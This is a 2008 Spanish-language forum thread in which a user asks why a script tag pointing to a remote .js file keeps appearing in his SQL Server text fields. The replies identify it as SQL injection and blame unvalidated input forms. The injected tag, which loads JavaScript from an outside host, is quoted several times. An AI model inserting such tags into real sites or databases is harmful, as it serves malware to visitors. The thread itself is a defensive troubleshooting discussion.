Forums Últimos mensajes - Powered by IBM
 
Tags Palabras claves

Script en campo de texto

10/07/2008 - 13:45 por Alvaro | Informe spam
Ayuda Hacer una pregunta
Hola.
Tengo una BD en un Sql Server 2005. Desde hace unos dias cada cierto tiempo
me aparece en los campos de texto, a continuación del texto un script a una
dirección web. Ej: texto<script src=http://www.usadw.com/ngg.js></script>.
Cada vez que consulto la base de datos me salta el antivirus como que ha
detectado un troyano.
Paso antivirus y no me detecta nada. He puesto contraseña al usuario "SA" y
nada.
Alguien sabe alguna solucion

Gracias.
email Siga el debateRespuesta 3 respuestasRespuesta Tengo una respuesta

Preguntas similare

Leer las respuestas

#1 DarthSidious
10/07/2008 - 14:17 | Informe spam
mira esta pagina:

http://www.bloombit.com/Articles/20...ction.aspx

salu2

"Alvaro" wrote:

Hola.
Tengo una BD en un Sql Server 2005. Desde hace unos dias cada cierto tiempo
me aparece en los campos de texto, a continuación del texto un script a una
dirección web. Ej: texto<script src=http://www.usadw.com/ngg.js></script>.
Cada vez que consulto la base de datos me salta el antivirus como que ha
detectado un troyano.
Paso antivirus y no me detecta nada. He puesto contraseña al usuario "SA" y
nada.
Alguien sabe alguna solucion

Gracias.
Respuesta Responder a este mensaje
#2 Gustavo Larriera (MVP)
10/07/2008 - 15:42 | Informe spam
En mi opinión y sin conocer los detalles, usted ha recibido un ataque por
inyección de código. Debería usted revisar detalladamente todas las entradas
de datos de aplicaciones que acceden a la base de datos.

Alguno le va a decir que la inyección de código es un problema de la base de
datos. No le crea: La inyección de código se produce debido a una mala
programación de los formularios de entrada de datos en las aplicaciones.

Gustavo Larriera, Microsoft MVP
http://www.linkedin.com/in/gustavolarriera
Este mensaje se proporciona tal como es, sin garantías de ninguna clase.



"Alvaro" wrote:

Hola.
Tengo una BD en un Sql Server 2005. Desde hace unos dias cada cierto tiempo
me aparece en los campos de texto, a continuación del texto un script a una
dirección web. Ej: texto<script src=http://www.usadw.com/ngg.js></script>.
Cada vez que consulto la base de datos me salta el antivirus como que ha
detectado un troyano.
Paso antivirus y no me detecta nada. He puesto contraseña al usuario "SA" y
nada.
Alguien sabe alguna solucion

Gracias.
Respuesta Responder a este mensaje
#3 Dario
16/07/2008 - 05:35 | Informe spam
Hola Alvaro, te comento que he padecido el mismo problema y que en mi caso el
ataque por SQL Injection lo estaban haciendo sobre el Querystring de una
pagina, te dejo éste link que está en castellano y te comenta el problema y
una posible solución http://www.programandoamedianoche.com/?p

Saludos y suerte



"Alvaro" wrote:

Hola.
Tengo una BD en un Sql Server 2005. Desde hace unos dias cada cierto tiempo
me aparece en los campos de texto, a continuación del texto un script a una
dirección web. Ej: texto<script src=http://www.usadw.com/ngg.js></script>.
Cada vez que consulto la base de datos me salta el antivirus como que ha
detectado un troyano.
Paso antivirus y no me detecta nada. He puesto contraseña al usuario "SA" y
nada.
Alguien sabe alguna solucion

Gracias.
email Siga el debate Respuesta Responder a este mensaje
Ads by Google
Help Hacer una preguntaRespuesta Tengo una respuesta
Search Busqueda sugerida